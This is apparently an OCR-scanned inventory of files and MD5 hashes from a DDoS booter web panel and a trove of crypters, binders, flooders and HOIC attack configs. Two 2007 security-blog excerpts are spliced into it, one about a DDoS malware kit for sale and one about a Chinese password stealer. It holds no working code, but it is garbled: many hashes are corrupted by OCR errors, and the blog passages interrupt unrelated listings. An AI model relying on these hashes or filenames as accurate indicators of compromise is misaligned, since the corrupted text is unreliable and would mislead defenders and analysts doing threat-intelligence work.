58d2cd501e01573cf537089c694ba899 

ui-bg _highlight-soft 100 eeeeee 1x100.png 
384c3f17709ba0f809b023b6e7b10b84 

ui-og _highlight-soft 75 ffe45c _1x100.png 
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b806658954cb4d16ade897 7af737f486 
ui-icons 222222 256x240.png 
ebe6b6902a408fbf9Ccac6379a1477525 
ui-icons 228ef1 _256x240.png 
79f41c0765e9ec18562b20b0801d748b 
ui-icons _ef8c08 _256x240.png 
ef9a6ccfe3b14041928ddc708665b226 
ui-icons ffd27a _256x240.png 
ab8c30acc0e3608fb79e01fccf832c70 
ui-icons _ffffff 256x240.png 
342bc03f6264c75d3f1d7f99e34295b9 
fontawesome-webfont.eot 
5f4a40c122903174c4227e6871b88cff 
fontawesome-webfont.svg 
13420cbc7af6227733d1lal2e5df28fe9 
fontawesome-webfont.ttf 
6ea09593203493bfd053ale838c62404 
fontawesome-webfont. woff 
04b9bfc362dcb9bc999c7d1bcb44a942 
fontawesome-webfontd41d.eot 
5f4a40c122903174c4227e6871b88cff 
avatar.jpg 
8e7cfef33b8180fde8579578c2c5421e 
bg.png 
ae80b7bacb9833eef33244c3d0fedb7c 
glyphicons-halflings-white.png 
9bbc6e9602998a385c2ea13df56470fd 
glyphicons-halflings.png 
74b801ed8644409a1d166bbf33ac3d95 
handle.png 
3d6a926309d7be89bfbaaf3539fa86a6 
page-title-bg.png 
5a24954f130825b32bc8390b1162308d 
title.png 
3bf19898ae07b5b884836ff37f3066c2 
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frame.png 
dfaOlcc7d159eb8fe3dbffc27c13d3fl1 


Irl.png 
136c49ca7f00b94265075de61cdd4235 
Irl _large.png 
6f56895219d8c3720304e48388ce7603 
Ir2.png 
884a5386a2da79e4406c4542352249ce 
Ir2_large.png 
babf87a41b33be6cle2e8684986dfd51 
Ir3.png 
caad4bea8d3c3efe3c3968f29245e835 
Ir3 _large.png 
2a85f5bef3e5100ccOfb4ede53012ad1 
Ir4.png 
e57f445ade1964bd14b32733419f3b09 
Ir4_large.png 
e5eb375cb175e76b4bd60deb610793d2 
Ir5.png 
31da2de775408446a8bc2a42cb22e920 
Ir5 _large.png 
e718c969f7027e0a816375bc756af3fa 
Ir6.png 
e08014a17f87462ee69e526c3ac35300 
Iré_large.png 
2baf95621906baeb1568902fa78f9a61 
4.jpg 
f976727adc1503e4f76466f90b7a4738 
check.png 
1e1f6e465a351892b4c3d3245c395aa6 
fb _btn.png 


3cd7724f1f49583079499423e782e7ea 
password.png 
bf7a1lcf9d90082164f8942f893062814 


twitter _btn.png 
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74bd66906dcd6653d82ea7cac1b711a9 


user.png fc087053b89fb4399d1fbb316d6eeeec 


cross.png 
42492684e24356a4081134894eabeb9e 
email.png 
af58188296abfe7adbf9280a563731f2 
page white copy.png 
38de59d96ecaal47d8b5f440b4c4b0e6 
page white go.png 
08cbb971307a4420839b409ea2eccf3d 
pencil.png 
a34e71ab08a6d1162b948d26321dea50 
printer.png 
242421c98dbd8b054fc76a036d04321¢c 
valid.png 
3a7f05f010b40b006e17066746ab817d 
css.php 
97955749a76dd924c7c50d2c34cf2767 
footer.php 
26f2b8c6a9ab5fcf2edd42ce99a0cbeb 
functions.php 
fb08d2c8a2df0577fal8d49cfeac982e 
header.php 
67081dba2c889698ade7a8418e4c4de6 
stats.php 
b644b25fdab1582aafe360665ea56d6f 
bootstrap.js 
Ode7fe47210e7736209d2fef5e5e5696 
jquery-1.7.2.min.js 
acc0adc6c188845a409bf158d2de4451 
jquery-ui-1.8.18.custom.min.js 
ab482777e459017809092a6bf1cOfc71 
jquery-ui-1.8.21.custom.min.js 
263684cccc9485eab6acc541c48e7ab6e 


jquery.ui.touch-punch.min.js 
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eb876f2754b9957f35d839b4ee75776e 
Slate.js b6cc7e93c98221160064a997f629cfdc 
demo.calendar.js 
06d375829a86a0942137d49e8bc3405c 
demo.faq.js 
bd2c8864bd1e5858b02f0b3f8aafa59b 
demo.gallery.js 
efeabb58aa62e78154419cdacada94d6 
demo.tables.js 
80a43137abe6e4647bbf49074184d5ae 
demo.ui-elements.js 
77d4e2d950c1f923e83d6efb7d557c21 
demo.validate.js 
da3bcaa4293830d59b08d334074aee2d 
demo.wizard.js 
250703a05a4edf8cadf05f65f8e82dd9 
area.js 
cbe291ebb181ca460f2581a4090a8ac3 
bar.js 
35fa43e57aa49c0385792287196b9d5d 
donut.js aflf6384de42ec42432aee8052f9f969 
line.js 
e5bf172204200ccf35c340840a55ead1 
pie.js 
05c169293267caf260058eba8a48a3bc 
colorpicker.css 
80b90e7eflb8d6e9d51e2ca294798ee9 
alpha.png 
10f4b956ec4d7e11c2b0c1ccllel18db1 
hue.png 
de10f7b98e37a57ee81149a71d2c6106 
saturation.png 
512a83ac26d1574e25d742fe81cf531b 
bootstrap-colorpicker.js 
8a2a8b50ffcacla90fcb3d116cdefcb7 
10790 


DT _bootstrap.css 
e3af2f22a0eb0ffd82c74a557bbb8007 
DT _bootstrap.js 
5f82a2efccec2870a78bf257572e491b 
jquery.dataTables.js 
46bdfa08298462991e8da9ce95dec158 
sort _asc.png 
816cc30745c3cbb710e1872aef757198 
sort both.png 
58872c6fclccfd69af8ff69d7128a07d 
sort _desc.png 
8e127eddeb3ed3622b56a7a8b5b102e7 
sort _asc.png 
60a9afd937310aelfc9d0b7605012850 
sort both.png 
58872c6fclccfd69af8ff69d7128a07d 
sort _desc.png 
a97846387e7d622e543024af6776cc19 
excanvas.min.js 
3682670784157eca627a91ae04f925b8 
faq.css 
d656738c7e066ed5b4bbcb6e4e56cfd9f 
faq.js 
dec54381f96efbee5b0d610d83e88405 
jquery.flot.js 
€38e58103853f44853096540c1c8066d 
jquery.flot.orderBars.js 
4a39ac97eb068c82601d02eb190b8a81 
jquery.flot.pie.js 
446c008453546019c7daa771426590f3 
jquery.flot.resize.js 
5f5d414398aab4f071ccbe772b49fb80 
fullcalendar.css 
b3c483e82c696f4b06b7152a2ccb84cl1 


fullcalendar.min.js 
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9ea7bb213862d1e23d7af33d4f1c3805 
jquery.lightbox.js 
f50adde566e9709b771c2cf77cad5c68 
jquery.lightbox.css 
91d55daff9aa0cc8fab60d60c7901642 
jquery-lightbox-theme.png 
73dd1f7b596faa2f5b5d9e6bb6a08fbae 
loading.gif 
e6a8elcb63b0af0a2c9b7db08bf8db9b 
msgAlert.css 
ea30alac7e54626f5ebdfe8bad3d9a2b 
msgAlert button _bg.png 
ddcbcc2f64434ff09085bd614fbO01ledb 
msgAlert _close.png 
66c210135d2b0e264f722008c56b84b4 
msgAlert _error.png 
9001d3974e84d8ddd8f6972c7a975c46 
msgAlert header.png 
9f35405709022f480c7b67859476008f 
msgAlert _info.png 
0235540f0960039311039efbf8bdd4bf 
msgAlert _success.png 
82819f3e5093bc04d0da97c223310cfe 
msgAlert _warning.png 
5164c55064feacf28509a47490d9d47d 
msgAlert.js 
62ce128befe7a015255fac5891693229 
msgGrowl.css 
be903fldd9c5fecc957d93b8119efcee 
msgGrowl close.png 
c9d029a1f34f550b3052103c42681576 
msgGrowl _error.png 
5abbd1be943ed72a3250bd8efca4bb82 
msgGrowl _info.png 
f9f84ac5962d843392ceb5381060229a 
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3.9.25 A New DDoS Malware Kit in the Wild (2007-09-29 16:44) 


ICMP * SYN @nyaqeper 


HTTP énvaer 


UDP « TCP/UDP ényAepe 


On the majority of occasions, malware authors either put efforts into implementing a set 
of standard features within a malware enabling them to send out spam, use the already 
infected hosts as future infection and propagation vectors, or entirely outsource the features 
by [1]releasing the malware as open source one. On the other hand, certain malware authors 
seem to avoid diversification and tend to stick to core competencies only, in this case a DDoS 
ready infected host as its only function, thereby decreasing the file size of the malware and 
sort of improving its stealthiness by putting the infected host in a passive "on demand" state 
compared to a situation where the host is already sending out spam and phishing emails could 
be much more easily identified as an infected one and its DDoS capability could turn irrelevant 
due the malware’s multi tasking activities. 


This specific DDoS malware kit currently offered for sale includes the standard firewall 
bypassing and rootkit capabilities, in between offering the possibility for zero day malware on 
demand once previous instances of the bot in question achieve a high detection rate. More- 
over, in between providing [2]custom DDoS capabilities like the ones | discussed in a previous 
post, it’s yet another indication of the ongoing Web-ization of [3]botnet communications which 
| think is about to replace the default use of the [4]IRC command and control in the long term. 


. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.html 
. http: //ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.html 
. http: //ddanchev. blogspot .com/2007/03/botnet- communication-platforms. html 


BWNEH 


. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search- engines. html 
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msgGrowl _success.png 
€069df54264456e36198352cc8702b2f 
msgGrowl _warning.png 
f040d7d04058121ae88e783aad77ea8b 
msgGrowl.js 
18600fcec02f374644951a1l5d9dfe945 
responsive-tables.css 
3364431395e5424eb6f73913d5e9d138 
responsive-tables.js 
e28adf10ad542c2b1da3a1c8833834f8 
jquery.smartWizard-2.0.modified.js 
54bc5cbc3d2958627064cala4e8decd0 
smart _wizard.modified.css 
f7ed089e7753622c862e89bde00d28ea 
jquery.ui.timepicker.css 
db17f3329c3ca9acdff851c80b816801 
jquery.ui.timepicker.min.js 
b1f7d0e371069b443814d01bed7e0fb3 
jquery.validate.js 
078f73355ce617bbc3e2404a0b422f4d 
header-bg.png 
edbc087b78c8a0bf88147e55749c4097 
Installation Guide.txt 
222133ce6c95e5107994e38fcO06alc5 
.DS Store 
53c890e812a02f51d6b91506bef3c881 
. .DS Store 
5ecad39c470178e1b0ef93e534b60fda 
. _activate.php 
4e7¢1b33a49835bf8d2688432212854d 
. _admin.php 
4e7¢1b33a49835bf8d2688432212854d 
. _check.php 
9abf98699c82d877b1a5352dc9a2a885 
. _checkuser.php 
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4e7c1b33a49835bf8d2688432212854d 
. _dbc.php 
9abf98699c82d877b1a5352dc9a2a885 
. .do.php 
4e7c1b33a49835bf8d2688432212854d 
. _footer.php 
9abf98699c82d877b1a5352dc9a2a885 
. .games.php 
9abf98699c82d877b1a5352dc9a2a885 
. _header.php 
9abf98699c82d877b1a5352dc9a2a885 
. _—hub.php 
9abf98699c82d877b1a5352dc9a2a885 
. _images 
4e7c1b33a49835bf8d2688432212854d 
. _includes 
4e7c1b33a49835bf8d2688432212854d 
. javascript 
4e7c1b33a49835bf8d2688432212854d 
. _login.php 
9abf98699c82d877b1a5352dc9a2a885 
. _logs.php 
4e7c1b33a49835bf8d2688432212854d 
. _manageshells.php 
4e7c1b33a49835bf8d2688432212854d 
. _mysettings.php 
4e7c1b33a49835bf8d2688432212854d 
. _online.php 
9abf98699c82d877b1a5352dc9a2a885 
. _purchase.php 
9abf98699c82d877b1a5352dc9a2a885 
. _register.php 
9abf98699c82d877b1a5352dc9a2a885 
. _thankyou.php 
9abf98699c82d877b1a5352dc9a2a885 
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activate.php 
29e8a708c05a3b3a94162bbde986f15c 


addshell.php 
c4f01cOef02c489a4ead88ccf3e65e77 
admin.php 
749795e582b37d30f18f28736b7f9d20 
check.php 
6947f85a6c046338f079224a984b7f29 
checkuser.php 
0491e6a35e63fc7da7b7d863e1f32f5d 
dbc.php 
f3b856ec637d22451b79156a3b9b8644 
do.php 
1b2000290158151cda00caac858e4a6b 
footer.php 
bd5fe31b820eb12b0c3abbb108eb1f71 
games.php 
0f7192dc1283118f84cf2f926a7908a3 
header.php 
cb8f9e5b559cf9e67924eb4331ed926e 
hub.php 
2f373f027c2a0b20f55e93444cbe0d7d 
index.php 
7733c1d5f5e64aff360cada59a025b11 
login.php 
ea919bc47da08b3042f47b879bb4dcc9 
logout.php 


£7f43702441b28154fb45ble2cddf99c 
logs.php 6846d0abab643c3779af3b1a27611bal 
manageshells.php 
£7¢4352a24fb121465160837a9276df1 
mysettings.php 
d94d6a0c4ad173956adea2c13554e732 
online.php 
71f72f7d4af6210f9d564e6b73fcc58e 
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purchase.php 
1d6251c24a90f0a0610990e15e446465 
register.php 
1d87d26584e1052a3bb2ac851d128b72 
shells.php 
535720c0cd383622df8ba2b0dd293bb0 
thankyou.php 
dca243783eaela5a92bd653c35874072 
updates.php 
f30db917bc87641fea9900bda4ccb4a8 
.DS Store 
aecf870c1f54a0ac056113c55873c296 

. .DS Store 
5ecad39c470178e1b0ef93e534b60fda 
. _account.png 
4e7¢1b33a49835bf8d2688432212854d 
. _add.png 
4e7c1b33a49835bf8d2688432212854d 
. _admin.png 
4e7c1b33a49835bf8d2688432212854d 
. _attack.png 
4e7¢1b33a49835bf8d2688432212854d 
. _background.jpg 
4e7c1b33a49835bf8d2688432212854d 
. _bg.gif 
4e7c1b33a49835bf8d2688432212854d 
. _box.gif 
4e7c1b33a49835bf8d2688432212854d 
. _cancel.png 
4e7c1b33a49835bf8d2688432212854d 
. delete.png 
4e7c1b33a49835bf8d2688432212854d 
. -home.gif 
4e7c1b33a49835bf8d2688432212854d 
. _hub.png 
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4e7¢1b33a49835bf8d2688432212854d 
. _info.gif 
4e7¢1b33a49835bf8d2688432212854d 
. _info.png 
4e7¢1b33a49835bf8d2688432212854d 
. _logo.png 
9d438fb315176e24c5e5d3f1c3d468a0 
. _navigation.gif 
4e7¢1b33a49835bf8d2688432212854d 
. _news.gif 
4e7¢1b33a49835bf8d2688432212854d 
. _styles.css 
4e7¢1b33a49835bf8d2688432212854d 
. _visit.png 
4e7¢1b33a49835bf8d2688432212854d 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062f7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background.jpg 
20ae8d57237de989c2e4102122c2253a 
bg.gif 
4986640d1caf7e8b8574c541711a9aea 
box.gif 
5b37c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
delete.png 
6bf9ba341234639d4550602fd35e0988 


home.gif d2c93d8510e7fc077f9ef7 765ff20a89 


hub.png 
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fdeaf68ba6e3b0ba507a55ee85143307 

info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png Obad85f30b97b1d1011c8161c66443f4 
logo.png 61323cbfa9f58813f61fal3e7b6ba8b7 
navigation. gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
news.gif 8b0a1312d184260ea42506f66298da5d 
styles.css 
8b5bff75al0ff63a8c39638985a284el 
Thumbs.db 

2e0c655693f8a567 782560d8218dd899 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 

.DS Store 
cb39fb6fdbd37ee7655054793396ba7b 

. .DS Store 
5ecad39c470178e1b0ef93e534b60fda 

. _EpiCurl.php 
4e7¢c1b33a49835bf8d2688432212854d 

. _ezSQL.php 
9abf98699c82d877b1a5352dc9a2a885 

. ezSQLCore.php 
4e7¢c1b33a49835bf8d2688432212854d 

. _functions.php 
9abf98699c82d877b1a5352dc9a2a885 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
6d3cd43c6cea66e435de36a46d559ad4 
ezSQLCore.php 
b20797087c5159c1d37fc51446033ce9 
functions.php 
6dc41dd8720eb670197d80cab9da2869 

. _count.js 
4e7c1b33a49835bf8d2688432212854d 

10798 


. jJquery-1.3.2.min.js 
4e7c1b33a49835bf8d2688432212854d 
. jJquery-1.4.4.min.js 
4e7¢c1b33a49835bf8d2688432212854d 
. jquery.validate.js 
4e7c1b33a49835bf8d2688432212854d 
count.js e3ad6cf280lafc8bb78ba0d0ca721c37 
jquery-1.3.2.min.js 
bb381e2d19d8eace86b34d20759491a5 
jquery-1.4.4.min.js 
73a9c334c5ca71d70d092b42064f6476 
jquery.validate.js 
d4afd58bbf0c43f0998264f92ae1d212 
0 Crypter .exe 
42e48811fac44aa61d558b11f5f5c507 
2012 Crypter.exe 
9b160f64ce82250a60c37ac850edac66 
Chrome Crypter 4.9.exe 
a97ca343b7c34d694f52b3be60b165fb 
DarkBinderV1.rar 
0248396da4aa6018dec53905c907dbb8 
Grieve Crypter 2012.exe 
fc6bceff2387ca871lac6b7dcé6f7f8ebd 
High Life Crypter.exe 
cfb30f9edd5db91983e7d2961899f474 
iBinder.exe 
deb9249b0fcc0d55813e4af7a87b2dcl1 
Infinity Crypter v2.exe 
437986e8e17940013f1f05bdafb2782d 
MoonCrypter.exe 
0ec3da715b4dd0c38c00d5102dbcc6c6 
no $crypter.exe 
5d051c389e7082d38e95081f8852e4bd 
Psomasweb Public Rinajel Crypter.exe 
10093b7a2cc08e52d866acdcb162abef 
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Saddam Crypter.exe 
7688c4cab5481b5127ae30bc5522735c 
ZMini.exe 

efaee196e003b99abf8930cbab6ccOf3 
ByteCrypter v3 cracked by blackpearl[deceptiveengineering.info].ex e 
3fbc28ae5d9dba28784e9f66833959e2 

Read me.doc 
€232257af831f35f4fdelc4552c490aa 
confkey.snk 
afd99f650b745388bff4906f6c359d5f 

Cryptex Advanced-V3.0.5 - Cracked by RON1N.exe 
d466d130d5913adff4c069b9f2ad96a9 
Mono.Cecil.dll 
d750c6e40c0c70bedc223d5dda891163 

Entropy _v5u2.exe 
ceal411be22105b60bd3e46eca35b3ee 
ConBind.xex 
80419a1a1538584b5f8c0ea44d80e96c 
EXE2VBS.exe 

4776539827 1af2f6917d4479d5d4cb20 
pack.exe 42badc1d2f03a8b1e4875740d3d49336 
Rand.dat 32f29d1b04be3732cbd1dbc6af58f7a0 
ResHacker.exe 
2f92eed4e2061af0961f379e9ded70d6 
ResHacker.ini 
19869c4a0bd52a9dedb52abe4f3dae61 
ResHacker.log 
d58813ea547788cea381852e9d16a42c 
ShellBind.xex 
3c51dd449f3e0d659deace46cac740c5 
Stage1Config.con 
2004854cd772cf8f72dc2dad50eef3ef 
Stage2ConfigMelt.con 
c4c293d06fb321bf20efeed8e2c3df3f 
Stage2ConfigNoMelt.con 
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5256d6bb004ab9e8 7 ffcfa6f46369400 
upx.exe 
ffa637abd482b5e7d3fb75182f43f080 
Injection Image Files.rar 
82fbfaaf8af3a262b361cf58c5304c96 
lolo.exe 5f7900183181ce5fddb2fc1b433dc3bc 
OwnZ Crypter Cracked.exe 
912d0dbf45dddf56894bal93ae36e51f 
READ ME.txt 
030e9feaaf50b5f81443ab5ae9f7844c 
borlo = Normal Stub.txt 

changelog.txt 
7f22715f9d869c906a32f02e1510f7ef 
How to register a serial number for Own’Z Crypter.pdf 
93da0f8f772fd6388e58371e36c87792 
lolo = Binder Stub.txt 

Native Images.txt 
e6ac62a2ac6531207efb57aa2833681e 
New license _sytem.txt 
b897f0a89alcca27b66bf7412a6a2bf5 
Normal 99 % __finish.txt 
161f45191e4fcdc311594676c7cc92a0 
aaa.exe 
42641e8f7b968007b77a5a91d48a60b7 
AAB.exe 
369f12dc43e4e422b1004082082b5dba 
ABB.exe 
f98d75e1b7d9cf872520d6dd448553c9 
ABC.exe 
4914fb1f8efec9331111b3b71b9e4aa3 
ACC.exe 
13d0d61085689f96c51116d270aa3b2e 
How To Use.txt 
1d952fad664c0d14fd454166af7 68ff1 


Refract’s Crypter.exe 
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23c6fa4e6b94422381302678a73d5785 
Stub.exe 95b2512fcea8d0589eac5479c79105fc 
CecilObfuscate.dll 
3ce095424648ccecf86b187866934bdb 
sikandar 8.1.0.0 cracked by blackpearl.exe 
071c49fd6606e0714281f06f54c23723 
Update Extension.dll 
ec2879c17e89d55c6b9dc627029a476a 
stub.exe 34f€594b5a24432b9c364e036f7e19bc 
UC.exe 
308c0a68d69fc65c5832086d3ab434d9 
360Booter+GBooter XBL.exe 
6e6c8817eab4da02456bda97 9fdf1479 
Anonymous DoSer.exe 
270f2f56afOde91cc5f0b83ed241851b 
BFF DoS (Ping) v1.0.exe 
2584fdc930667c942b2cd0319d685107 
BuffMods DDos V2.exe 
aaee9fbf9a5c3d5fdd058c9bOfe7 7fed 
BuffMods DDos.exe 
31b2cc201c59689efc1falc645e6d976 
DarkMagic Flooder.exe 
20d6555cdf90e6b702bd91f14cbda093 
Desktop Booter.exe 
fcf727fe8538bc7c06ab6b7372ce5e9e 
Destroy DoS.zip 
eb3cc3fcaf5b2a4b6ca421cf4524d712 
DevModding DDos v3.zip 
fbo18cea7babcd28a22d38bd6f32e4178 
Exploit Attacker v1.1.exe 
3222f726b752bea68ab4a0c55eaa5ffd 
Flooder.exe 
b1715c48b6466b22b290fc08f71889d2 
Pro Dos.zip 
92736f245505ela116a24e8bdb0bc97e 
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3.9.26 DIY Chinese Passwords Stealer (2007-09-29 19:14) 
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This DIY passwords stealer courtesy of a chinese hacking group is pitched as Vista Compatible, 
with a server size in less than 20kb, process injection, form grabbing and password stealing 
capabilities for anything keyloggable, anti virus software killing capabilities, and uploading of 
the results to a central location, in this particular case an example is given for notification via 
Tencent, China’s main IM network. [1]More info : 


"Backdoor.Hupigon.GEN has rootkit functionality. It injects itself into Internet Explorer 
causing IE to hide itself. It also logs keystrokes and sends this information to remote servers." 


Detection rate of the builder: Result: 15/32 (46.88 %) 
File size: 267213 bytes 

MD5: a4b9c9f42629865c542ac7b823982843 

SHA1: 78f855843d312ab76e1f8f0b912bd475781a8864 


[2]Here are several more [3]recent releases by [4]Chinese hacking groups, as well as a 
comment on [5]the big picture. 

1. http://www.pctools.com/mrc/infections/id/Backdoor.Hupigon.GEN/ 

2. http: //ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 

3. http: //ddanchev. blogspot .com/2007/09/chinese-malware-downloader-in-wild.htm 
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Shockwave Booter v2.0.exe 
1¢72942961917ccf4fc5bele823ab4cb 
UDP Flooder By FKN.exe 
6e1e88b43b1dc54f36aa4fd2a4167e2b 
Unknown DoSer release.exe 
4f3782e2f6f8daeeb7cf7957d60b8044 
WicKds Booter v3.1.exe 
914bb10e7e05eb5c0d152baa67020fd8 
Anonymous High Orbit lon Cannon.exe 
bff3f5b6a77ad6077f8bb450db4d0aal 
Ataque Hola de Libertad.hoic 
8545406e9887fff9b7d23bd8d1ba827a 
Bombas de Energia.hoic 
bc3480db06614b5e56376559d4138c8e 
Paquete de Impulso Aumentado.hoic 
117dcd32592d6785a55c9ceac79bd557 
Paquete de Impulso.hoic 
4715a3d5e2323168c4afeb3637fc127b 
Appearance Pak.dll 
d3f07fa59e8eff7fbo7e1ac9355a73c75 
Internet Encodings.dll 
2f51e9b688de640db24cab6eccc4231el 
RBScript.dll 
b0901956a3e2b819e42f6779a56c2025 
ByteDOS v3.2.exe 
997d9bb1c8453de00e6c806fca09b54e 
MSWINSCK.OCX 
9484c04258830aa3c2f2a70eb041414c 
Registrar.bat 
d9e2cd2e6460e9391028bf90732ccc71 


c5d6f8fc820e06b6ffcc9c957947481c 
assault 1.0.rar 
20d3a31240f3fbedfa0378e72df959d7d 


battle pong.rar 
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3377e038a2dfe5428992f0d73e732acf 
bdOrk’s DoS Killer.rar 
9863931c1f4143b3c3d805a278921198 
bitchslap _1.0.rar 
021426f0d4c79d04ce1223d7cceb6f902 
bitslap.rar 
736a9d04be11da11720b43c9eff07b7d 
blood _lust.rar 
5c589deeeb5065b39ece475685bd7ea2 
click _2.2.rar 
2ec82788ef0a21c4b8943604afcdaf48 
crazyping _1.1.rar 
eacc19844c211ace22405f3a330ded01 
death n_destruction.rar 
9f45d27abb827936cd2c42839526ac69 
donut http flooder _1.4.rar 
679abc84449ec53861fa1f101d46d00f 
fed up _2.0.rar 
7¢7e5b858306a3608d6fc39cd2f4e706 
firewall killer _1.3.rar 
3168c50998649e3dbca42b6d08f3el10f 
gimp.rar b63c3b7e25d5bd1cecd5e87149ef5b69 
Hartz4Flooder v0.2.rar 
10436d8973e7b3cf13589a28d23b9641 
hospitables nuker 2.2.rar 
ec84baaal68b85d09b51b5fb76341977 
igmp _nuke _1.0.rar 
71594ccf34043af9dc92a9034a56f4a9 
inferno _nuker.rar 
3f4a50283b1e754c7988dff13096e807 
kaput 1.0 beta _1.5.rar 
49afcad5bfc785f2dfbocd79a64e7d125 
killme _1.0.rar 
6dbc9ccé6ffc8cf56c70219edfffabe5d 
krate port bomber.rar 
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037c27876aed5ad505b2ac2c9e3f2720 
meliksah nuke _2.5.rar 
52dbea505708910d36485a18750b8cd6 
muerte _2.1.rar 
471¢C8888e02c44278f2829ef46f22fd6 
nemesy _1.3.rar 
dae42d71b0eb2f96fbeef21af64ec560 
panther _2.0.rar 
9ed2e638509943c5f7922d37e98d38b1 
razors dos tool _1.1.rar 
f017ed18582b3f52dc2da9d0f5féea5fb 
rocket _1.0.rar 
a23adleffbe145938cf5e3e0342dc0c5 
spoofed irc _nuker _1.3.rar 
22ccedb4268a5841a0c9bae457ba48fd 
Try2DdoS.rar 
cb138286ce2a40c0210182be8343344f 
DDos V2.0 By Mike12.exe 
83abf5de577a35c0c995e7c58f0290f5 
Lggi qui se hai problemi.txt 
21e401b76332cb3b19add9443c27b171 
mswinsck.ocx 
3d8fd62d17a44221e07d5c535950449b 
DdoS v2.0.0 Universal.exe 
612858c232d0885fe2127c6b4ec91lae4 
ddvniek’s Hacker Toolbox 1.2.exe 
eee822bbf3249d38dfe405e8e216ec54 
D-Chatterbox Client 1.0.exe 
dc261bc155a47280f7d9fbae01e78d4f 
Client. ini 
425583e8b4a89c061f5d1a54b13b255f 
RemoteDesktopClient.exe 
cac3334e48303c8ad6a3decc45050daa 
CONFIG.dat 
4de42d0f6b065f051fb5ff2fe530276a 
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DoSHTTP.exe 
99baa8d24ce0e5ad14b1b9db3cff8482 
INSTALL.LOG 
45b13fd368eaa2ccc26c78210902ec97 
LicenseAgreement. rtf 
f59200d3b3b7c09bfd379e367aaf652F 
LicenseAgreement.txt 
dle88fba57f32fc7481db2302cf13a3d 
UA.cfg 
dc2bddf146d0ca8141558618e985bf51 
UNWISE.EXE 
973567b98cdfc147df4e60471d9df072 
UserGuide. rtf 
dec3fa4e5a7bc588681a2b353059e046 
UserGuide.txt 
83112d25d310c3ffeb55cf207fb3093a 
AxInterop.MSWinsockLib.dll 
54efbc05d29b0f107741ed643dcb5c68 
Dragon Attack vl.exe 
b5373497d26629bbe389f871c9c3d568 
Interop.MSWinsockLib.dll 
343ec1e971305f4b45e8cb168cb2caac 
DrBlowFish’s DoS.exe 
8a3b1e4408fc81lebc286b2c603c5e7bb 
CreateBot.bat 
61c6caf77f53273e7186e3454f2cf358 
HC - Client 2.6.exe 
381a7975408bc5ad7602c75b68cc42c3 
Info.ini 53a9e98e33f1d88660ba62a2cd7818fe 
ReadMeg ....txt 
365d932931724102c06b2afa308513ac 
Bot NotEdited.exe 
85ccc5e53f58eelecc5166b7fb47ca5f 
server.exe 
b9facb4fa796cb795506617e21fcc7c5 
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Codejock.Controls.v13.4.0.Demo.ocx 
bab9a2a9eae830ed495cbbfefl1fb7 7f9 
CODEJO 1.oca 
940e225116684f37fb387fc33fdb7d05 
comctl32.o0cx 
eb5f811c1f78005b3c147599a0cccf51 
COMDLG32.0CX 
d76f0eab36f83a31d41laeaf70da7396 
MSCOMCTL.OCX 
ecc7d7f0d3446de36045d1d9e964fafe 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1e00 
CreateBot.bat 
61c6caf77f53273e7186e3454f2cf358 
Info.ini b3a4673af42dd7d47aba817b4466c7e2 
ReadMeg ....txt 
365d932931724102c06b2afa308513ac 
Codejock.Controls.v13.4.0.Demo.ocx 
bab9a2a9eae830ed495cbbfefl1fb77f9 
CODEJO 1.oca 
940e225116684f37fb387fc33fdb7d05 
comctl32.0cx 
eb5f811c1f78005b3c147599a0cccf51 
COMDLG32.0CX 
d76f0eab36f83a31d41laeaf70da7396 
MSCOMCTL.OCX 
ecc7d7f0d3446de36045d1d9e964fafe 
MSWINSCK.OCX 
3d8fd62d17a44221e07d5c535950449b 
Registrator.exe 
0a107bbfl38aaac2daeac73cb56f1le00 
Hack.exe 66064dbdb70a5eb15ebf3bf65aba254b 
Icon _1.ico 
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8c4f592491dcc9c7a2d04cbb35f1f3b0 
RemoveBot.bat 
0381b30e53b41fc5b9f14b77b4996e18 

upx.exe 

308f709a8f01371a6dd088a793e65a5f 

Hack.exe 66064dbdb70a5eb15ebf3bf6é5aba254b 
Icon _1.ico 

8c4f592491dcc9c7a2d04cbb35f1f3b0 
RemoveBot.bat 
0381b30e53b41fc5b9f14b77b4996e18 

upx.exe 

308f709a8f01371a6dd088a793e65a5f 

DUTCH FREEDOM.txt 
bf52ede817b83d7d35eca8ffe5bfcdle 
DutchFreedom.hoic 
8545406e9887fff9b7d23bd8d1ba827a 
GenericBoost.hoic 
117dcd32592d6785a55c9ceac79bd557 

HOIC DOCUMENTATION FOR HACKERS.txt 
cllfdac966d5923ce44a6aal07bd3d82 
hoic.rdp.rbp 
ec16992ad983106a7a3c6d4c78914425 
hoic2.1.exe 
451¢94a23536dcbba422d7612b34b6ff 
user-agent-test.hoic 
bc3480db06614b5e56376559d4138c8e 

visa _stress.hoic 
4715a3d5e2323168c4afeb3637fc127b 
buttons.rar 
7d7495cdeb9b52f12d32460027782d0d 
4add.png 062587a5eb25732f2dc466abal26a21c 
6266.png d899f1c4072365d42dd6eacbdf8d9280 
666.png 

59ff8d3a3539122b35142116a3a8a0ac 

6666.png b63b5663149586f34127fd3c47d26cca 
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add.png 
8ade13213352f64d34e561d2e0a0f454 
add2.png d98f80edfa546f413106fac5b1de9877 
add3.png ae39f32971ba9b649el1e817c2cf6le8e 
button - Copy.png 
3e759alfdc0a9cb94239284af36ae651 
button.png 
3e759alfdc0a9cb94239284af36ae651 
button3.png 
37¢9854daf077cd50a91e4bf0dd320bf 
button4.png 
01dcd72ab51e145129ec54cae7cbfle5 
button5y.png 
O01dcd72ab51e145129ec54cae7cbfle5 
lazer.png 
5dfc0a47f6309048ae3a68208685c3b8 
remo4ve.png 
1d1172a772171f24b0615e59442bd329 
remove.png 
Oefffla2c8d7d86cee7b9963a7662a20 
removeqw.png 
ffab67111f3d2ab27a9ae03c37b36edb 
scripts.png 
